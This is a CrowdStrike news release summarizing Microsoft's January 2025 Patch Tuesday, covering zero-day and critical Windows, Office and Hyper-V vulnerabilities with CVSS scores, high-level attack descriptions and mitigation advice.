Crowdstrike Holdings Inc.
01/14/2025 | News release | Distributed by Public on 01/14/2025 22:29
January 2025 Patch Tuesday: 10 Critical Vulnerabilities and Eight Zero-Days Among 159 CVEs
Actively Exploited Zero-Day Vulnerabilities in Windows Hyper-V NT Kernel Integration VSP
Windows Hyper-V NT Kernel Integration VSP received patches for CVE-2025-21333, CVE-2025-21334 and CVE-2025-21335, which all have a severity of Important and a CVSS score of 7.8. These elevation of privilege (EoP) vulnerabilities allow an attacker who successfully exploits them to gain SYSTEM privileges. Microsoft has indicated the weaknesses are due to heap-based buffer overflow but has not shared details of the vulnerabilities or source of disclosure.
| Severity | CVSS Score | CVE | Description |
| Important | 7.8 | CVE-2025-21333 | Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability |
| Important | 7.8 | CVE-2025-21334 | Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability |
| Important | 7.8 | CVE-2025-21335 | Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability |
Publicly Disclosed Zero-Day Vulnerabilities in Microsoft Office Access, Windows App Package Installer and Windows Themes
Microsoft Office Access received patches for CVE-2025-21366, CVE-2025-21186 and CVE-2025-21395, which all have a severity of Important and a CVSS score of 7.8. These RCE vulnerabilities are exploited by opening specially crafted Microsoft Access documents. Microsoft has addressed this attack vector by blocking access to certain types of extensions in addition to patching the vulnerabilities.
| Severity | CVSS Score | CVE | Description |
| Important | 7.8 | CVE-2025-21366 | Microsoft Access Remote Code Execution Vulnerability |
| Important | 7.8 | CVE-2025-21395 | Microsoft Access Remote Code Execution Vulnerability |
| Important | 7.8 | CVE-2025-21186 | Microsoft Access Remote Code Execution Vulnerability |
Windows App Package Installer received a patch for CVE-2025-21275, which has a severity of Important and a CVSS score of 7.8. This EoP vulnerability allows an attacker who successfully exploits it to gain SYSTEM privileges. Microsoft has indicated that the weakness is due to improper authorization but has not shared details of the vulnerability or source of disclosure.
| Severity | CVSS Score | CVE | Description |
| Important | 7.8 | CVE-2025-21275 | Windows App Package Installer Elevation of Privilege Vulnerability |
Windows Themes received a patch for CVE-2025-21308, which has a severity of Important and a CVSS score of 6.5. This spoofing vulnerability allows attackers to exploit specially crafted Themes files in Windows Explorer, potentially leaking users' credentials. This occurs when Themes files specify network paths for BrandImage and Wallpaper options, prompting automatic authentication to remote hosts. In order to successfully exploit this vulnerability, the attacker would have to first convince the user to load a malicious file onto their system before executing the specially crafted Themes files. Microsoft has provided mitigation details, which include disabling NTLM and/or restricting outgoing NTLM traffic to remote servers.
| Severity | CVSS Score | CVE | Description |
| Important | 6.5 | CVE-2025-21308 | Windows Themes Spoofing Vulnerability |
Critical Vulnerability in Windows Reliable Multicast Transport Driver
CVE-2025-21307 is a Critical RCE vulnerability affecting Windows Reliable Multicast Transport Driver (RMCAST) and has a CVSS score of 9.8. An unauthenticated attacker can exploit this vulnerability by sending specially crafted packets to a Windows Pragmatic General Multicast (PGM) open socket on the server, without any user interaction. However, exploitation is only possible if a program is actively listening on a PGM port. The vulnerability is not exploitable if PGM is installed or enabled but no programs are listening as receivers.
Since PGM does not authenticate requests, it's crucial to protect access to any open ports at the network level, such as with a firewall. It is strongly advised to avoid exposing a PGM receiver to the public internet due to these security risks.
| Severity | CVSS Score | CVE | Description |
| Critical | 9.8 | CVE-2025-21307 | Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability |
Critical Vulnerability in Windows OLE
CVE-2025-21298 is a Critical RCE vulnerability with a CVSS score of 9.8 and affects Windows OLE (Object Linking and Embedding), which is a technology that allows embedding and linking to documents and other objects. In an email attack scenario, an attacker could exploit this vulnerability by sending a specially crafted email to the victim. Exploitation of this vulnerability might involve either a victim opening the specially crafted email with an affected version of Microsoft Outlook software, or a victim's Outlook application displaying a preview of the specially crafted email. This could result in the attacker executing remote code on the victim's machine.
| Severity | CVSS Score | CVE | Description |
| Critical | 9.8 | CVE-2025-21298 | Windows OLE Remote Code Execution Vulnerability |
Critical Vulnerability in Windows NTLMv1
CVE-2025-21311 is a Critical elevation of privilege vulnerability affecting Windows NTLMv1 and has a CVSS score of 9.8. NTLMv1 and NTLMv2 are two versions of the NTLM (NT LAN Manager) authentication protocol used in Windows environments. This vulnerability is remotely exploitable from the internet. Its low attack complexity means attackers need minimal system knowledge and can consistently succeed with their payload against the vulnerable component. To mitigate, set LmCompatibilityLevel to its maximum value (5) on all machines, disabling the older NTLMv1 protocol while retaining NTLMv2 functionality.
| Severity | CVSS Score | CVE | Description |
| Critical | 9.8 | CVE-2025-21311 | Windows NTLMv1 Elevation of Privilege Vulnerability |
Two Critical Vulnerabilities in Windows Remote Desktop Services
CVE-2025-21309 and CVE-2025-21297 are Critical RCE vulnerabilities affecting Windows Remote Desktop Services and have a CVSS score of 8.1. To exploit these vulnerabilities, an attacker must win a race condition by precisely timing their actions. The attack involves connecting to a system running the Remote Desktop Gateway role, then triggering the race condition to create a use-after-free scenario. If successful, the attacker can leverage this to execute arbitrary code on the target system.
| Severity | CVSS Score | CVE | Description |
| Critical | 8.1 | CVE-2025-21309 | Windows Remote Desktop Services Remote Code Execution Vulnerability |
| Critical | 8.1 | CVE-2025-21297 | Windows Remote Desktop Services Remote Code Execution Vulnerability |
Critical Vulnerability in Microsoft Digest Authentication
CVE-2025-21294 is a Critical RCE vulnerability affecting Microsoft Digest Authentication and has a CVSS score of 8.1. Exploiting this vulnerability hinges on an attacker winning a race condition. The attack involves connecting to a system requiring digest authentication, then timing the exploitation to create a use-after-free scenario. If successful, this allows the attacker to execute arbitrary code on the target system.
| Severity | CVSS Score | CVE | Description |
| Critical | 8.1 | CVE-2025-21294 | Microsoft Digest Authentication Remote Code Execution Vulnerability |
Critical Vulnerability in SPNEGO Extended Negotiation (NEGOEX) Security Mechanism
CVE-2025-21295 is a Critical RCE vulnerability affecting SPNEGO (Simple and Protected GSSAPI Negotiation Mechanism) Extended Negotiation (NEGOEX) Security Mechanism and has a CVSS score of 8.1. SPNEGO NEGOEX Security Mechanism allows for secure negotiation of the authentication protocol to be used between a client and a server. It is often used in web-based authentication scenarios, particularly with Internet Explorer and IIS (Internet Information Services).
This vulnerability can be exploited if an attacker manipulates system operations in a specific way. If successful, the attacker could execute remote code on the target system without any user interaction, potentially gaining unauthorized control over the affected device.
| Severity | CVSS Score | CVE | Description |
| Critical | 8.1 | CVE-2025-21295 | SPNEGO NEGOEX Security Mechanism Remote Code Execution Vulnerability |
Two Critical Vulnerabilities in Microsoft Excel
CVE-2025-21354 and CVE-2025-21362 are Critical RCE vulnerabilities affecting Microsoft Excel and have a CVSS score of 7.8. Microsoft has indicated that the weakness is due to untrusted pointer dereference but has not shared details of the vulnerability. The attack vector is the Preview Pane, which we have seen many times in other vulnerabilities (April 2023, July 2023, December 2023, October 2024).
| Severity | CVSS Score | CVE | Description |
| Critical | 7.8 | CVE-2025-21354 | Microsoft Excel Remote Code Execution Vulnerability |
| Critical | 7.8 | CVE-2025-21362 | Microsoft Excel Remote Code Execution Vulnerability |
Critical Vulnerability in BranchCache
CVE-2025-21296 is a Critical RCE vulnerability affecting BranchCache and has a CVSS score of 7.5. BranchCache is a Microsoft Windows feature designed to improve network performance in branch offices. BranchCache is particularly valuable for organizations looking to optimize network performance across distributed locations without significant infrastructure investments. The vulnerability has a high attack complexity - in this case, successful exploitation requires the attacker to win a race condition. The attack vector is adjacent, limiting the attack to systems on the same network segment as the attacker. This attack cannot be performed across multiple networks and is restricted to systems on the same network switch or virtual network.
| Severity | CVSS Score | CVE | Description |
| Critical | 7.5 | CVE-2025-21296 | BranchCache Remote Code Execution Vulnerability |
Not All Relevant Vulnerabilities Have Patches: Consider Mitigation Strategies
As we have learned with other notable vulnerabilities, such as Log4j, not every highly exploitable vulnerability can be easily patched. As is the case for the ProxyNotShell vulnerabilities, it's critically important to develop a response plan for how to defend your environments when no patching protocol exists.
Regular review of your patching strategy should still be a part of your program, but you should also look more holistically at your organization's methods for cybersecurity and improve your overall security posture.
The CrowdStrike Falcon platform regularly collects and analyzes trillions of endpoint events every day from millions of sensors deployed across 176 countries. Watch this demo to see the Falcon platform in action.
Learn More
Learn more about how CrowdStrike FalconĀ® Exposure Management can help you quickly and easily discover and prioritize vulnerabilities and other types of exposures here.
About CVSS Scores
The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities' severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article.
Additional Resources